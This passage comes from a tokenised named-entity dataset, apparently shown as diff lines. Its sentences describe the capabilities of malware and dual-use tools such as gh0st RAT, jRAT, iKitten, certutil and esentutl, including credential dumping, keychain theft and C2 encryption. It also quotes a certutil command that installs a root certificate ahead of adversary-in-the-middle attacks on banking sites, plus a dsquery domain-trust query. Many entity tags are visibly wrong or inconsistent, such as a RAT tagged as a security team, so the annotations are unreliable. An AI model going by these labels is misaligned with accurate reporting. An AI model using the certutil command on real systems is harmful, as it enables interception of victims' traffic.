- "on", - "targeted", - "systems,", - "naming", - "it", - "after", - "the", - "current", - "local", - "time", - "(year,", - "month,", - "and", - "day)." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "B-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "ccf32", - "can", - "temporarily", - "store", - "files", - "in", - "a", - "hidden", - "directory", - "on", - "the", - "local", - "host." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "I-Features", - "I-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "ccf32", - "has", - "copied", - "files", - "to", - "a", - "remote", - "machine", - "infected", - "with", - "Chinoxy", - "or", - "another", - "backdoor." - ], - "ner_tags": [ - "B-SamFile", - "O", - "I-Features", - "I-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "ccf32", - "can", - "run", - "on", - "a", - "daily", - "basis", - "using", - "a", - "scheduled", - "task." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "ccf32", - "can", - "determine", - "the", - "local", - "time", - "on", - "targeted", - "machines." - ], - "ner_tags": [ - "B-SamFile", - "O", - "B-Features", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "ccf32", - "has", - "used", - "`cmd.exe`", - "for", - "archiving", - "data", - "and", - "deleting", - "files." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "B-SamFile", - "O", - "B-Features", - "I-Features", - "O", - "B-Features", - "O" - ] - }, - { - "tokens": [ - "certutil", - "may", - "be", - "used", - "to", - "Base64", - "encode", - "collected", - "data." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "certutil", - "has", - "been", - "used", - "to", - "decode", - "binaries", - "hidden", - "inside", - "certificate", - "files", - "as", - "Base64", - "information." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "B-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "certutil", - "can", - "be", - "used", - "to", - "download", - "files", - "from", - "a", - "given", - "URL." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "I-Features", - "I-Features", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "certutil", - "can", - "be", - "used", - "to", - "install", - "browser", - "root", - "certificates", - "as", - "a", - "precursor", - "to", - "performing", - "Adversary-in-the-Middle", - "between", - "connections", - "to", - "banking", - "websites.", - "Example", - "command:", - "<code>certutil", - "-addstore", - "-f", - "-user", - "ROOT", - "ProgramData\\cert512121.der</code>." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "I-Features", - "I-Features", - "I-Features", - "B-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Idus", - "O", - "O", - "O", - "B-SamFile", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "cmd", - "can", - "be", - "used", - "to", - "delete", - "files", - "from", - "the", - "file", - "system." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "B-Features", - "I-Features", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "cmd", - "can", - "be", - "used", - "to", - "find", - "files", - "and", - "directories", - "with", - "native", - "functionality", - "such", - "as", - "<code>dir</code>", - "commands." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "I-Features", - "I-Features", - "I-Features", - "B-HackOrg", - "O", - "O", - "O", - "O", - "O", - "B-SamFile", - "O" - ] - }, - { - "tokens": [ - "cmd", - "can", - "be", - "used", - "to", - "copy", - "files", - "to/from", - "a", - "remotely", - "connected", - "external", - "system." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "I-Features", - "I-Features", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "cmd", - "can", - "be", - "used", - "to", - "copy", - "files", - "to/from", - "a", - "remotely", - "connected", - "internal", - "system." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "I-Features", - "I-Features", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "cmd", - "can", - "be", - "used", - "to", - "find", - "information", - "about", - "the", - "operating", - "system." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "I-Features", - "I-Features", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "cmd", - "is", - "used", - "to", - "execute", - "programs", - "and", - "other", - "actions", - "at", - "the", - "command-line", - "interface." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "I-Features", - "I-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "down_new", - "has", - "the", - "ability", - "to", - "list", - "the", - "directories", - "on", - "a", - "compromised", - "host." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "I-Features", - "I-Features", - "B-HackOrg", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "down_new", - "has", - "the", - "ability", - "to", - "download", - "files", - "to", - "the", - "compromised", - "host." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "I-Features", - "I-Features", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "down_new", - "has", - "the", - "ability", - "to", - "list", - "running", - "processes", - "on", - "a", - "compromised", - "host." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "I-Features", - "I-Features", - "I-Features", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "down_new", - "has", - "the", - "ability", - "to", - "detect", - "anti-virus", - "products", - "and", - "processes", - "on", - "a", - "compromised", - "host." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "I-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "down_new", - "has", - "the", - "ability", - "to", - "gather", - "information", - "on", - "installed", - "applications." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "I-Features", - "I-Features", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "down_new", - "has", - "the", - "ability", - "to", - "base64", - "encode", - "C2", - "communications." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Idus" - ] - }, - { - "tokens": [ - "down_new", - "has", - "the", - "ability", - "to", - "AES", - "encrypt", - "C2", - "communications." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "B-Way", - "O" - ] - }, - { - "tokens": [ - "down_new", - "has", - "the", - "ability", - "to", - "identify", - "the", - "system", - "volume", - "information", - "of", - "a", - "compromised", - "host." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "B-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "down_new", - "has", - "the", - "ability", - "to", - "identify", - "the", - "MAC", - "address", - "of", - "a", - "compromised", - "host." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "B-Features", - "O", - "B-Features", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "down_new", - "has", - "the", - "ability", - "to", - "use", - "HTTP", - "in", - "C2", - "communications." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "dsquery", - "can", - "be", - "used", - "to", - "gather", - "information", - "on", - "user", - "accounts", - "within", - "a", - "domain." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "I-Features", - "I-Features", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "dsquery", - "can", - "be", - "used", - "to", - "gather", - "information", - "on", - "permission", - "groups", - "within", - "a", - "domain." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "I-Features", - "I-Features", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "dsquery", - "can", - "be", - "used", - "to", - "gather", - "information", - "on", - "domain", - "trusts", - "with", - "<code>dsquery", - "*", - "-filter", - "\"(objectClass=trustedDomain)\"", - "-attr", - "*</code>." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "I-Features", - "I-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-SamFile", - "O" - ] - }, - { - "tokens": [ - "dsquery", - "has", - "the", - "ability", - "to", - "enumerate", - "various", - "information,", - "such", - "as", - "the", - "operating", - "system", - "and", - "host", - "name,", - "for", - "systems", - "within", - "a", - "domain." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "B-Features", - "I-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "esentutl", - "can", - "be", - "used", - "to", - "collect", - "data", - "from", - "local", - "file", - "systems." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "I-Features", - "I-Features", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "esentutl", - "can", - "use", - "the", - "Volume", - "Shadow", - "Copy", - "service", - "to", - "copy", - "locked", - "files", - "such", - "as", - "`ntds.dit`." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "I-Tool", - "I-Tool", - "O", - "O", - "O", - "I-Features", - "I-Features", - "I-Features", - "O", - "O", - "B-SamFile" - ] - }, - { - "tokens": [ - "esentutl", - "can", - "be", - "used", - "to", - "copy", - "files", - "from", - "a", - "given", - "URL." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "I-Features", - "I-Features", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "esentutl", - "can", - "be", - "used", - "to", - "copy", - "files", - "to/from", - "a", - "remote", - "share." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "I-Features", - "I-Features", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "esentutl", - "can", - "copy", - "`ntds.dit`", - "using", - "the", - "Volume", - "Shadow", - "Copy", - "service." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "B-SamFile", - "O", - "O", - "B-Tool", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "esentutl", - "can", - "be", - "used", - "to", - "read", - "and", - "write", - "alternate", - "data", - "streams." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "B-Features", - "O", - "I-Features", - "I-Features", - "I-Features", - "O" - ] - }, - { - "tokens": [ - "ftp", - "may", - "be", - "used", - "to", - "exfiltrate", - "data", - "separate", - "from", - "the", - "main", - "command", - "and", - "control", - "protocol." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "B-Features", - "I-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "ftp", - "may", - "be", - "abused", - "by", - "adversaries", - "to", - "transfer", - "tools", - "or", - "files", - "from", - "an", - "external", - "system", - "into", - "a", - "compromised", - "environment." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "I-Features", - "I-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "ftp", - "may", - "be", - "abused", - "by", - "adversaries", - "to", - "transfer", - "tools", - "or", - "files", - "between", - "systems", - "within", - "a", - "compromised", - "environment." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "I-Features", - "I-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "gh0st", - "RAT", - "is", - "able", - "to", - "wipe", - "event", - "logs." - ], - "ner_tags": [ - "B-SamFile", - "B-SecTeam", - "O", - "O", - "O", - "I-Features", - "I-Features", - "O" - ] - }, - { - "tokens": [ - "gh0st", - "RAT", - "is", - "able", - "to", - "open", - "a", - "remote", - "shell", - "to", - "execute", - "commands." - ], - "ner_tags": [ - "B-SamFile", - "B-SecTeam", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "A", - "gh0st", - "RAT", - "variant", - "has", - "used", - "DLL", - "side-loading." - ], - "ner_tags": [ - "O", - "B-SamFile", - "B-SecTeam", - "O", - "O", - "O", - "B-Features", - "B-HackOrg" - ] - }, - { - "tokens": [ - "gh0st", - "RAT", - "has", - "decrypted", - "and", - "loaded", - "the", - "gh0st", - "RAT", - "DLL", - "into", - "memory,", - "once", - "the", - "initial", - "dropper", - "executable", - "is", - "launched." - ], - "ner_tags": [ - "B-Idus", - "B-SecTeam", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "B-SecTeam", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "gh0st", - "RAT", - "has", - "encrypted", - "TCP", - "communications", - "to", - "evade", - "detection." - ], - "ner_tags": [ - "B-Idus", - "B-Tool", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "gh0st", - "RAT", - "operators", - "have", - "used", - "dynamic", - "DNS", - "to", - "mask", - "the", - "true", - "location", - "of", - "their", - "C2", - "behind", - "rapidly", - "changing", - "IP", - "addresses." - ], - "ner_tags": [ - "B-Idus", - "B-HackOrg", - "O", - "O", - "O", - "I-Tool", - "I-Tool", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "gh0st", - "RAT", - "has", - "the", - "capability", - "to", - "to", - "delete", - "files." - ], - "ner_tags": [ - "B-SamFile", - "B-SecTeam", - "O", - "O", - "O", - "O", - "O", - "B-Features", - "O" - ] - }, - { - "tokens": [ - "gh0st", - "RAT", - "can", - "download", - "files", - "to", - "the", - "victim’s", - "machine." - ], - "ner_tags": [ - "B-SamFile", - "B-SecTeam", - "O", - "I-Features", - "I-Features", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "gh0st", - "RAT", - "has", - "a", - "keylogger." - ], - "ner_tags": [ - "B-SamFile", - "B-SecTeam", - "O", - "O", - "B-Way" - ] - }, - { - "tokens": [ - "gh0st", - "RAT", - "has", - "altered", - "the", - "InstallTime", - "subkey." - ], - "ner_tags": [ - "B-Way", - "B-Tool", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "gh0st", - "RAT", - "has", - "used", - "the", - "`InterlockedExchange`,", - "`SeShutdownPrivilege`,", - "and", - "`ExitWindowsEx`", - "Windows", - "API", - "functions." - ], - "ner_tags": [ - "B-Idus", - "B-HackOrg", - "O", - "O", - "O", - "O", - "B-Tool", - "O", - "B-Tool", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "gh0st", - "RAT", - "has", - "used", - "an", - "encrypted", - "protocol", - "within", - "TCP", - "segments", - "to", - "communicate", - "with", - "the", - "C2." - ], - "ner_tags": [ - "B-Idus", - "B-HackOrg", - "O", - "O", - "O", - "B-Way", - "B-Tool", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "gh0st", - "RAT", - "has", - "the", - "capability", - "to", - "list", - "processes." - ], - "ner_tags": [ - "B-SamFile", - "B-SecTeam", - "O", - "O", - "O", - "O", - "I-Features", - "O" - ] - }, - { - "tokens": [ - "gh0st", - "RAT", - "can", - "inject", - "malicious", - "code", - "into", - "process", - "created", - "by", - "the", - "“Command_Create&Inject”", - "function." - ], - "ner_tags": [ - "B-SamFile", - "B-SecTeam", - "O", - "B-Way", - "O", - "B-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "gh0st", - "RAT", - "has", - "checked", - "for", - "the", - "existence", - "of", - "a", - "Service", - "key", - "to", - "determine", - "if", - "it", - "has", - "already", - "been", - "installed", - "on", - "the", - "system." - ], - "ner_tags": [ - "B-Idus", - "B-Tool", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "gh0st", - "RAT", - "has", - "added", - "a", - "Registry", - "Run", - "key", - "to", - "establish", - "persistence." - ], - "ner_tags": [ - "B-Idus", - "B-Tool", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "A", - "gh0st", - "RAT", - "variant", - "has", - "used", - "rundll32", - "for", - "execution." - ], - "ner_tags": [ - "O", - "B-SamFile", - "B-SecTeam", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "gh0st", - "RAT", - "can", - "capture", - "the", - "victim’s", - "screen", - "remotely." - ], - "ner_tags": [ - "B-SamFile", - "B-SecTeam", - "O", - "B-Features", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "gh0st", - "RAT", - "can", - "execute", - "its", - "service", - "if", - "the", - "Service", - "key", - "exists.", - "If", - "the", - "key", - "does", - "not", - "exist,", - "gh0st", - "RAT", - "will", - "create", - "and", - "run", - "the", - "service." - ], - "ner_tags": [ - "B-Way", - "B-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-SamFile", - "B-SecTeam", - "O", - "O", - "O", - "O", - "O", - "B-Features" - ] - }, - { - "tokens": [ - "gh0st", - "RAT", - "can", - "load", - "DLLs", - "into", - "memory." - ], - "ner_tags": [ - "B-SamFile", - "B-SecTeam", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "gh0st", - "RAT", - "has", - "used", - "Zlib", - "to", - "compress", - "C2", - "communications", - "data", - "before", - "encrypting", - "it." - ], - "ner_tags": [ - "B-Idus", - "B-HackOrg", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "gh0st", - "RAT", - "uses", - "RC4", - "and", - "XOR", - "to", - "encrypt", - "C2", - "traffic." - ], - "ner_tags": [ - "B-Idus", - "B-HackOrg", - "O", - "B-Way", - "O", - "B-Way", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "gh0st", - "RAT", - "has", - "gathered", - "system", - "architecture,", - "processor,", - "OS", - "configuration,", - "and", - "installed", - "hardware", - "information." - ], - "ner_tags": [ - "B-SamFile", - "B-SecTeam", - "O", - "I-Features", - "I-Features", - "O", - "B-Features", - "O", - "B-Features", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "gh0st", - "RAT", - "can", - "create", - "a", - "new", - "service", - "to", - "establish", - "persistence." - ], - "ner_tags": [ - "B-Way", - "B-Tool", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "gsecdump", - "can", - "dump", - "LSA", - "secrets." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "gsecdump", - "can", - "dump", - "Windows", - "password", - "hashes", - "from", - "the", - "SAM." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "hcdLoader", - "provides", - "command-line", - "access", - "to", - "the", - "compromised", - "system." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "hcdLoader", - "installs", - "itself", - "as", - "a", - "service", - "for", - "persistence." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "httpclient", - "encrypts", - "C2", - "content", - "with", - "XOR", - "using", - "a", - "single", - "byte,", - "0x12." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "httpclient", - "uses", - "HTTP", - "for", - "command", - "and", - "control." - ], - "ner_tags": [ - "B-SamFile", - "O", - "B-Way", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "httpclient", - "opens", - "cmd.exe", - "on", - "the", - "victim." - ], - "ner_tags": [ - "B-SamFile", - "O", - "B-SamFile", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "iKitten", - "will", - "zip", - "up", - "the", - "/Library/Keychains", - "directory", - "before", - "exfiltrating", - "it." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "iKitten", - "prompts", - "the", - "user", - "for", - "their", - "credentials." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "iKitten", - "saves", - "itself", - "with", - "a", - "leading", - "\".\"", - "so", - "that", - "it's", - "hidden", - "from", - "users", - "by", - "default." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "iKitten", - "collects", - "the", - "keychains", - "on", - "the", - "system." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "iKitten", - "lists", - "the", - "current", - "processes", - "running." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "iKitten", - "adds", - "an", - "entry", - "to", - "the", - "rc.common", - "file", - "for", - "persistence." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "B-SamFile", - "I-SamFile", - "O", - "O" - ] - }, - { - "tokens": [ - "iKitten", - "will", - "look", - "for", - "the", - "current", - "IP", - "address." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "ifconfig", - "can", - "be", - "used", - "to", - "display", - "adapter", - "configuration", - "on", - "Unix", - "systems,", - "including", - "information", - "for", - "TCP/IP,", - "DNS,", - "and", - "DHCP." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "I-Features", - "B-HackOrg", - "B-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "B-Way", - "O", - "B-Way" - ] - }, - { - "tokens": [ - "ipconfig", - "can", - "be", - "used", - "to", - "display", - "adapter", - "configuration", - "on", - "Windows", - "systems,", - "including", - "information", - "for", - "TCP/IP,", - "DNS,", - "and", - "DHCP." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "I-Features", - "B-HackOrg", - "B-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "B-Way", - "O", - "B-Way" - ] - }, - { - "tokens": [ - "jRAT", - "can", - "capture", - "microphone", - "recordings." - ], - "ner_tags": [ - "B-SamFile", - "O", - "I-Features", - "I-Features", - "O" - ] - }, - { - "tokens": [ - "jRAT", - "can", - "capture", - "clipboard", - "data." - ], - "ner_tags": [ - "B-SamFile", - "O", - "I-Features", - "B-HackOrg", - "B-Features" - ] - }, - { - "tokens": [ - "jRAT", - "can", - "capture", - "passwords", - "from", - "common", - "chat", - "applications", - "such", - "as", - "MSN", - "Messenger,", - "AOL,", - "Instant", - "Messenger,", - "and", - "and", - "Google", - "Talk." - ], - "ner_tags": [ - "B-SamFile", - "O", - "I-Features", - "B-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "B-Tool", - "B-Way", - "B-Way", - "B-Tool", - "O", - "O", - "I-Tool", - "O" - ] - }, - { - "tokens": [ - "jRAT", - "can", - "capture", - "passwords", - "from", - "common", - "web", - "browsers", - "such", - "as", - "Internet", - "Explorer,", - "Google", - "Chrome,", - "and", - "Firefox." - ], - "ner_tags": [ - "B-SamFile", - "O", - "I-Features", - "B-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O", - "I-Tool", - "O", - "I-Tool", - "O", - "O", - "B-Way" - ] - }, - { - "tokens": [ - "jRAT", - "has", - "a", - "function", - "to", - "delete", - "files", - "from", - "the", - "victim’s", - "machine." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "B-Features", - "I-Features", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "jRAT", - "can", - "browse", - "file", - "systems." - ], - "ner_tags": [ - "B-SamFile", - "O", - "B-Features", - "I-Features", - "O" - ] - }, - { - "tokens": [ - "jRAT", - "can", - "download", - "and", - "execute", - "files." - ], - "ner_tags": [ - "B-SamFile", - "O", - "B-Features", - "O", - "I-Features", - "O" - ] - }, - { - "tokens": [ - "jRAT", - "has", - "been", - "distributed", - "as", - "HTA", - "files", - "with", - "JScript." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "B-SamFile", - "O", - "O", - "B-Way" - ] - }, - { - "tokens": [ - "jRAT", - "has", - "the", - "capability", - "to", - "log", - "keystrokes", - "from", - "the", - "victim’s", - "machine,", - "both", - "offline", - "and", - "online." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "I-Features", - "B-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "jRAT’s", - "Java", - "payload", - "is", - "encrypted", - "with", - "AES.", - "Additionally,", - "backdoor", - "files", - "are", - "encrypted", - "using", - "DES", - "as", - "a", - "stream", - "cipher.", - "Later", - "variants", - "of", - "jRAT", - "also", - "incorporated", - "AV", - "evasion", - "methods", - "such", - "as", - "Java", - "bytecode", - "obfuscation", - "via", - "the", - "commercial", - "Allatori", - "obfuscation", - "tool." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "jRAT", - "can", - "map", - "UPnP", - "ports." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "jRAT", - "can", - "steal", - "keys", - "for", - "VPNs", - "and", - "cryptocurrency", - "wallets." - ], - "ner_tags": [ - "B-SamFile", - "O", - "I-Features", - "I-Features", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "jRAT", - "can", - "query", - "and", - "kill", - "system", - "processes." - ], - "ner_tags": [ - "B-SamFile", - "O", - "B-Features", - "O", - "I-Features", - "I-Features", - "O" - ] - }, - { - "tokens": [ - "jRAT", - "can", - "serve", - "as", - "a", - "SOCKS", - "proxy", - "server." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "B-Way", - "I-Tool", - "O" - ] - }, - { - "tokens": [ - "jRAT", - "can", - "support", - "RDP", - "control." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "B-Way", - "O" - ] - }, - { - "tokens": [ - "jRAT", - "can", - "be", - "configured", - "to", - "reconnect", - "at", - "certain", - "intervals." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "jRAT", - "has", - "the", - "capability", - "to", - "take", - "screenshots", - "of", - "the", - "victim’s", - "machine." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "I-Features", - "B-HackOrg", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "jRAT", - "can", - "list", - "security", - "software,", - "such", - "as", - "by", - "using", - "WMIC", - "to", - "identify", - "anti-virus", - "products", - "installed", - "on", - "the", - "victim’s", - "machine", - "and", - "to", - "obtain", - "firewall", - "details." - ], - "ner_tags": [ - "B-SamFile", - "O", - "I-Features", - "I-Features", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "jRAT", - "payloads", - "have", - "been", - "packed." - ], - "ner_tags": [ - "B-SamFile", - "B-SecTeam", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "jRAT", - "can", - "list", - "and", - "manage", - "startup", - "entries." - ], - "ner_tags": [ - "B-SamFile", - "O", - "B-Features", - "O", - "B-Features", - "O", - "O" - ] - }, - { - "tokens": [ - "jRAT", - "collects", - "information", - "about", - "the", - "OS", - "(version,", - "build", - "type,", - "install", - "date)", - "as", - "well", - "as", - "system", - "up-time", - "upon", - "receiving", - "a", - "connection", - "from", - "a", - "backdoor." - ], - "ner_tags": [ - "B-SamFile", - "I-Features", - "I-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "jRAT", - "can", - "gather", - "victim", - "internal", - "and", - "external", - "IPs." - ], - "ner_tags": [ - "B-SamFile", - "O", - "B-Features", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "jRAT", - "can", - "list", - "network", - "connections." - ], - "ner_tags": [ - "B-SamFile", - "O", - "I-Features", - "I-Features", - 